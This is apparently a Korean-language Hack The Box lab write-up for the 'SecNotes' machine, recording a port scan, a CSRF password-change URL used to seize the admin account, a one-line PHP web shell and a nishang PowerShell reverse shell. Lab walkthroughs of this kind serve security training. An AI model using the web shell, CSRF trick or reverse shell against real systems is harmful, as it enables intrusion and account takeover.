[HTB] SecNotes

┌─[root@htb-kglh74yzbw]─[/home/chaem]
└──╼ #nmap -sT -p- --min-rate 10000 10.129.187.77
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-06 09:31 CDT
Nmap scan report for 10.129.187.77
Host is up (0.076s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
8808/tcp open  ssports-bcast

옵션에따라 8808이 안나오는 경우가 있었다. 8808에는 IIS 서비스가 올라가 있다.

웹 접속 후 계정 생성해서 로그인

contact Us를 이용해야 하는건가.. tyler라는 관리자 계정이 있는 것으로 보인다.

XSS 가능..

그렇다면 CSRF가 되나? note는 나만 보는거라 아닐 것 같고, Contact에 CSRF를 해보려고 시도할가 했으나 아닐 것 같아서 말았는데... CSRF라 해서 URL을 자동으로 리다이렉트 하도록 스크립트를 보냈으나 되지 않았다. 근데 그냥 URL만 보내면 URL이 실행되었다...

contact에 http://secnotes.htb/change_pass.php?password=123456&confirm_password=123456&submit=submit 패스워드를 바꾸는 URL을 보내면, tyler 계정의 패스워드가 변경된다.

smbclient로 접속

웹쉘이용

<?php echo shell_exec($_GET["c"]); ?>

웹쉘을 이용해서 리버스쉘로 붙는 스크립트를 사용한다.

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

스크립트 맨 마지막에 다음 명령어를 추가하고 smbclient로 같이 업로드 해준다.

Invoke-PowerShellTcp -Reverse -IPAddress 내PC의 IP주소 -Port 4444

 

burp를 이용해서 해당 스크립트를 실행하는 명령어를 인코딩해서 전송한다.

그러면 리버스쉘이 연결된 것을 확인할 수 있다.